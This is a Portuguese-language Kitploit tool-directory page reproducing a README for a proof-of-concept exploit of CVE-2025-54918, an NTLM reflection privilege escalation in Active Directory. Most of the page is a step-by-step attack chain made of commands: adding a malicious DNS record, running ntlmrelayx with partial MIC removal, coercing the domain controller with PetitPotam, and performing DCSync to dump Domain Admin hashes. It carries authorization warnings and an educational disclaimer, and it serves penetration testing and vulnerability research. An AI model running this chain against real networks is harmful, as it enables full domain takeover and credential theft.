Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-54918-POC — POC para CVE-2025-54918 e uma demonstração técnica. | Kitploit
Ferramentas/GitHubGitHub/wh0am123/cve-2025-54918-poc
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoAutenticaçãoAprendizado e EducaçãoRed TeamingLabs e Prática
GitHubwh0am123/cve-2025-54918-poc

CVE-2025-54918-POC

POC para CVE-2025-54918 e uma demonstração técnica.

Ver Repositório
64723há 8 mesesRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2025-54918 – Prova de Conceito (PoC)

⚠️ Aviso Importante

IMPORTANTE:
Para testar a CVE-2025-54918, você deve criar um registro DNS no ambiente do Active Directory de destino.
Sempre consulte o cliente e obtenha autorização explícita antes de testar, pois isso pode impactar o comportamento de DNS e autenticação em ambientes de produção.

Este repositório contém uma Prova de Conceito técnica demonstrando como um usuário de domínio com baixos privilégios pode escalar para acesso de nível Administrador de Domínio abusando de reflexão NTLM combinada com coerção de autenticação.

Nota: a CVE é explorável mesmo com signing definido como True, que é o padrão para um controlador de domínio. Além disso, a correção da CVE-2025–54918 foi para o Windows 2025 , e a CVE-2025–33073 corrigiu (não intencionalmente) para o Windows 2022.

Uma análise mais técnica está disponível na minha página do Medium: https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1


Ambiente

  • IP do Controlador de Domínio: 192.168.140.150 (Signing é True, que é o padrão para um controlador de domínio)
  • IP do Atacante: 192.168.140.135
  • Domínio: nahya.local
  • Usuário: test Usuário de domínio válido (sem privilégios de DCSync)

Ferramentas

Clone os repositórios necessários:

root@kitploit:~
git clone https://github.com/dirkjanm/krbrelayx.git
git clone https://github.com/decoder-it/impacket-partial-mic.git

Validação de Linha de Base (Falha Esperada)

Verifique se o usuário não consegue executar DCSync antes da exploração:

root@kitploit:~
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

Usuário Normal


Etapa 1: Adicionar Registro DNS Malicioso

Crie um registro DNS usando o nome NetBIOS + 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA que resolva para o IP do atacante.

root@kitploit:~
python3 dnstool.py -u 'nahya.local\USERNAME' -p 'PASSWORD' \
  dc.nahya.local -a add \
  -r 'localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA' \
  -d '192.168.140.135' -dns-ip 192.168.140.150

Adicionando DNS


Etapa 2: Iniciar NTLM Relay (Terminal 1)

Execute o ntlmrelayx com remoção parcial do MIC e escalonamento LDAP habilitado:

root@kitploit:~
python3 impacket-partial-mic/examples/ntlmrelayx.py --remove-mic-partial -smb2support -t ldaps://DC  --escalate-user USERNAME  --no-validate-privs

Iniciando o ntlmrelayx


Etapa 3: Forçar Autenticação do Controlador de Domínio (Terminal 2)

Force o Controlador de Domínio a autenticar no registro DNS controlado pelo atacante usando uma técnica de coerção (PetitPotam):

root@kitploit:~
nxc smb DC -u 'USERNAME' -p 'PASSWORD' -M coerce_plus -o METHOD=PetitPotam LISTENER=localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA

Coagindo o DC


Etapa 4: Verificar a Exploração (DCSync)

Execute novamente o secretsdump para confirmar o escalonamento de privilégios:

root@kitploit:~
python3 impacket-partial-mic/examples/secretsdump.py USERNAME:PASSWORD@DC

✅ Resultado esperado: DCSync bem-sucedido e obtenção dos hashes de Administrador de Domínio

DCSync Funcionou


Resultado

Neste ponto, o atacante:

  • Retransmitiu a autenticação NTLM do Controlador de Domínio (Signing True)
  • Escalonou privilégios via LDAP
  • Alcançou DCSync, resultando em comprometimento total do domínio

Consulte o artigo no Medium para uma explicação aprofundada da vulnerabilidade e da cadeia de ataque.


🙏 Créditos

Este trabalho não teria sido possível sem:

  • Bryan De Houwer – Autor da CVE-2025-54918 https://www.linkedin.com/in/bryan-de-houwer/
  • Andrea Pierini – Por sua excelente pesquisa e blogs no decoder.cloud https://www.linkedin.com/in/andrea-pierini-aba9a37/
  • Andrea Pierini – Pela implementação do impacket-partial-mic
    https://github.com/decoder-it/impacket-partial-mic

🔗 Referências

  • Analisando a vulnerabilidade de bypass de autenticação NTLM & LDAP – Blog da CrowdStrike
    https://www.crowdstrike.com/en-us/blog/analyzing-ntlm-ldap-authentication-bypass-vulnerability/

  • Advisory de Segurança da Microsoft – CVE-2025-54918 – Guia de Atualização do MSRC
    https://msrc.microsoft.com/update-guide/advisory/CVE-2025-54918


Aviso Legal

Esta Prova de Conceito é fornecida apenas para fins educacionais e de testes de segurança autorizados.

  • Não use esta técnica contra sistemas que você não possui ou para os quais não tenha permissão explícita para testar.
  • O autor não assume nenhuma responsabilidade por uso indevido ou danos.
  • Sempre siga práticas de divulgação responsável e hacking ético.
Baixar ferramenta